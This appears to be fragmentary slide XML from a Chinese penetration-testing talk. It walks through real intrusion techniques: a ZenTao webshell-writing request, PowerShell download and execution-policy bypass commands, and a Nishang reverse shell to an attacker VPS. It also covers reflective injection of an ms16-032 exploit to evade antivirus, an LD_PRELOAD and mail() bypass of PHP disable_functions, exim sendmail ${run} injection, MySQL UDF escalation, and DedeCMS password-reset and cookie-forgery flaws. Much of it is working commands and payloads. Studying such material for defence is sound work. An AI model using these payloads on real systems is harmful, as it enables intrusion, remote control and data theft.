              <a:t>来攻破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0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4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4" dur="1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9" dur="1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4" dur="10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9" dur="10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4" dur="10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9" dur="10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271778" y="1503680"/>
            <a:ext cx="450646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File: /module/api/control.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="247" name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930" y="2297945"/>
            <a:ext cx="11552140" cy="325271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1786780" y="3390900"/>
            <a:ext cx="10087721" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF26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18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303528" y="5847079"/>
            <a:ext cx="22377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可调用任意类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5930" y="1503680"/>
            <a:ext cx="4972303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File：/module/editor/model.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="252" name="image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41074"/>
            <a:ext cx="12192000" cy="4255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92044" y="1897378"/>
            <a:ext cx="12007913" cy="2702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利用：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc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t>?m=api&amp;f=getModel&amp;moduleName=editor&amp;methodName=save&amp;params=filePath=aaaaaa.php </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:defRPr sz="24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7200">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc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t>POST内容：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc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t>fileContent=&lt;?php $_POST[1]($_POST[2]); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Shape 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113029" y="4475479"/>
            <a:ext cx="7476489" cy="621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4200"/>
              </a:lnSpc>
              <a:defRPr sz="2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shell地址：C:\test\xampp\zentaopro\module\api\aaaaaa.php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417830" y="474980"/>
            <a:ext cx="3025748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3、POWERSHELL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466330" y="1668779"/>
            <a:ext cx="11259341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拿到一个mssql的sa，恢复xp_cmdshell后即可执行命令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目前情况：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1、低权限用户可执行命令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2、有杀软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3、处于内网之中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270911" y="1490979"/>
            <a:ext cx="11453074" cy="263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文件下载到服务器：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echo ^$d = New-Object System.Net.WebClient &gt;&gt; c:\KRECYCLE\1.ps1 &amp; echo ^$d.DownloadFile(^"http://10.0.25.1/others/64.exe^",^"c:\KRECYCLE\3.exe^") &gt;&gt; c:\KRECYCLE\1.ps1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注意某些字符需要加上转义字符^</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468629" y="5834379"/>
            <a:ext cx="11235435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但是很多EXE都是被干掉的！EXP也没几个能用！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="570230" y="4424679"/>
            <a:ext cx="9885628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powershell </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ExecutionPolicy Bypass</a:t>
            </a:r>
            <a:r>
              <a:t> -File c:\KRECYCLE\1.ps1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powershell默认是不能执行的，但是这样绕过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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="261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260349" y="1478280"/>
            <a:ext cx="11671303" cy="466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VPS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nc -vlp 8888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反弹powershell的shell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powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invoke-PowerShellTcp.ps1</a:t>
            </a:r>
            <a:r>
              <a:t>');Invoke-PowerShellTcp -Reverse -IPAddress VpsIp -port 8888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15010" y="1668779"/>
            <a:ext cx="11161980" cy="263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IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invoke-ReflectivePEInjection.ps1</a:t>
            </a:r>
            <a:r>
              <a:t>');Invoke-ReflectivePEInjection -PEUrl http://vpsip/down/ms16-032_x64.exe -ExeArgs '</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:t>' -ForceASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2424428" y="4856479"/>
            <a:ext cx="7072477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加载远程的exe到内存中执行，从而绕过杀软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443229" y="436880"/>
            <a:ext cx="2945383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4、Nginx解析漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373378" y="1668779"/>
            <a:ext cx="11445244" cy="263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大家很熟悉的一点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回顾一下：当上传头像为1.jpg，其中内容是一句话的时候，1.jpg/1.php的访问是可以将1.jpg作为php执行的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但是很尴尬的是，找不到什么上传点之类的东西</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Shape 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468629" y="4424679"/>
            <a:ext cx="8432291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google搜寻了一番记录文件之类的：</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filetype:log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最后在SVN机器意外的发现</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web目录下面还有log目录</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2600"/>
              </a:solidFill>
            </a:endParaR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通过某个</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql.log</a:t>
            </a:r>
            <a:r>
              <a:t>进行Getshell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05128" y="373379"/>
            <a:ext cx="483148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5、Bypass Disabled Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285868" y="1656079"/>
            <a:ext cx="11076768" cy="227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拿到webshell之后，发现内核版本很低，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>没法执行命令</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2600"/>
              </a:solidFill>
            </a:endParaR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 defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc>
              <a:defRPr>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>phpinfo,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dl</a:t>
            </a:r>
            <a:r>
              <a:t>,eval,exec,passthru,system,popen,shell_exec,proc_open,proc_terminate,show_source,touch,escapeshellcmd,escapeshellarg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Shape 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="540022">
            <a:off x="9885258" y="1719579"/>
            <a:ext cx="2034539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solidFill>
                  <a:srgbClr val="FF93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老司机！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 276"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9734550" y="1429295"/>
            <a:ext cx="2335958" cy="1345111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18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328929" y="5059679"/>
            <a:ext cx="8509877" cy="125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4700"/>
              </a:lnSpc>
              <a:defRPr>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>一个关于收集姿势的小项目：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="4700"/>
              </a:lnSpc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https://github.com/l3m0n/Bypass_Disable_functions_Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259736" y="4018279"/>
            <a:ext cx="8559363" cy="68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4700"/>
              </a:lnSpc>
              <a:defRPr>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>但是貌似还缺了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:t>函数，业务有调用，不能禁用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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="276" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="277" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="278" grpId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0380" y="1503680"/>
            <a:ext cx="11080285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Mail函数介绍：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mail(to,subject,message,headers,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="281" name="image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2884260"/>
            <a:ext cx="12192000" cy="3146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90440" y="1609731"/>
            <a:ext cx="7917382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可利用点的思路：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1、前台重置dede_member的admin密码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2、cookie绕过admin</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>登录</a:t>
            </a:r>
            <a:r>
              <a:t>前台(默认是不能登录的)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3、通过</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2F13"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前台功能</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF9300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:t>dede_admin中的</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin密码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94029" y="1503680"/>
            <a:ext cx="6483019" cy="496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File：hack.c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#include &lt;stdlib.h&gt;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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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void payload() {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      </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system("echo aaaaa&gt; /tmp/abc.txt");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}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int  geteuid() {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if (getenv("LD_PRELOAD") == NULL) { return 0; }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unsetenv("LD_PRELOAD");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payload();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="23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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Shape 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7402830" y="5085079"/>
            <a:ext cx="4450282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编译为so文件：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gcc -c -fPIC hack.c -o hack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gcc -shared hack -o hack.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Shape 285"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5987338" y="1363980"/>
            <a:ext cx="6135521" cy="218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php代码</a:t>
            </a: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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2400"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putenv("LD_PRELOAD=/var/www/hack.so");</a:t>
            </a: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mail("a@localhost","","","","");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="24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?&gt;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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="284" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="28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36879" y="1541780"/>
            <a:ext cx="11015370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为什么可以bypass？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在UNIX中，</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LD_PRELOAD</a:t>
            </a:r>
            <a:r>
              <a:t>可以定义</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程序运行前优先加载</a:t>
            </a:r>
            <a:r>
              <a:t>的动态链接库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621780" y="5707379"/>
            <a:ext cx="5494323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经过php在调用系统的system函数</a:t>
            </a:r>
          </a:p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绕过：直接调用系统的system函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353414" y="2875278"/>
            <a:ext cx="11002568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sendmail是mail会去调用的程序，会动态调用geteuid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当geteuid函数被调用的时候，又会加载payload函数，导致执行命令！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379729" y="4208779"/>
            <a:ext cx="10334395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php中的disable_functions来禁用函数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其禁用的过程是调用zend_disable_function函数将</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指定的函数名从CG(function_table)函数表中删除，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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="288" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="290" grpId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338652" y="1275080"/>
            <a:ext cx="12061629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Mail的第五个参数的利用(exim4扩展)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sandal -eb xxx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环境：docker pull nicescale/sendmail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="293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82661"/>
            <a:ext cx="12192000" cy="117588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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303529" y="3429670"/>
            <a:ext cx="10880089" cy="202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${run{&lt;command&gt; &lt;args&gt;}{&lt;string1&gt;}{&lt;string2&gt;}}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命令执行成功返回string1，执行失败返回string2</a:t>
            </a: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sendmail -t -i -f root@localhost -be '</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${run{/usr/bin/touch /tmp/lemon.txt}{1}{0}}</a:t>
            </a:r>
            <a:r>
              <a:t>'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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="293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494029" y="1694178"/>
            <a:ext cx="11203942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…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$payload = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}/tmp/aaaaaaaaaaa.sh}{ok}{error}}"</a:t>
            </a:r>
            <a:r>
              <a:t>;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mail("a@localhost", "", "", "", $payload);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="image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618" y="4260846"/>
            <a:ext cx="23080437" cy="220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68629" y="449580"/>
            <a:ext cx="359470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6、Linux下的UDF提权</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532129" y="1783079"/>
            <a:ext cx="11127742" cy="263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从webshell中翻到数据库配置信息，库站分离，猜到root的密码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目前情况：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只有一个可远程连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root权限Mysql</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2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image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94" y="1545673"/>
            <a:ext cx="12077012" cy="5033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485359" y="1490980"/>
            <a:ext cx="11221282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linux下的udf一般不成功，但是此次项目中居然成功了！导致后面翻到更多敏感信息运维脚本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443230" y="2926078"/>
            <a:ext cx="12075768" cy="36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一般不成功原因在于：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默认配置：/usr/lib/mysql/plugin是没权限写的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导入导出的时候也要注意系统的位数，(uname -a)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UDF.SO下载位置：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https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql/linux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760730" y="1668778"/>
            <a:ext cx="10615675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扩散：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UDF本质是</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>创建自定义函数，</a:t>
            </a:r>
            <a:r>
              <a:t>不单单是mysql可以</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2600"/>
              </a:solidFill>
            </a:endParaRP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https://github.com/sqlmapproject/sqlmap/tree/master/udf/postgresql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4043679" y="2824478"/>
            <a:ext cx="4104639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300"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谢谢观看！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78568" y="446327"/>
            <a:ext cx="2075586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1、重置密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13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058" y="1515201"/>
            <a:ext cx="10446878" cy="502278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 rot="21595098">
            <a:off x="6123009" y="1346902"/>
            <a:ext cx="707929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100">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill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File: /member/resetpassword.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6163188" y="2642548"/>
            <a:ext cx="5112409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$safequestion默认为0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利用0.0绕过empty与后面的判断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47983" y="386970"/>
            <a:ext cx="6514895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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>2、伪造cookie登陆admin的前台会员中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13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3" y="1496707"/>
            <a:ext cx="9452127" cy="553147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9663189" y="2861858"/>
            <a:ext cx="2459633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为了安全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前台是不能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr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直接登陆admin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45315" y="1686793"/>
            <a:ext cx="11793219" cy="466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File: /member/config.php</a:t>
            </a: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//判断用户是否登录</a:t>
            </a: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$myurl = '';</a:t>
            </a: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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$cfg_ml-&gt;IsLogin()</a:t>
            </a:r>
            <a:r>
              <a:t>){</a:t>
            </a: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	$myurl = $cfg_memberurl."/index.php?uid=".urlencode($cfg_ml-&gt;M_LoginID);</a:t>
            </a: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	if(!ereg('^http:',$myurl)){</a:t>
            </a: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		$myurl = $cfg_basehost.$myurl;</a:t>
            </a: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	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="25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57" y="2446528"/>
            <a:ext cx="12192001" cy="407806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6804248" y="1194229"/>
            <a:ext cx="5415736" cy="291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File: /include/memberlogin.class.php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function IsLogin(){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if(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$this-&gt;M_ID &gt; 0</a:t>
            </a:r>
            <a:r>
              <a:t>) return true;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  else return false;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2600">
                <a:latin typeface="YuppySC-Regular"/>
                <a:ea typeface="YuppySC-Regular"/>
                <a:cs typeface="YuppySC-Regular"/>
                <a:sym typeface="YuppySC-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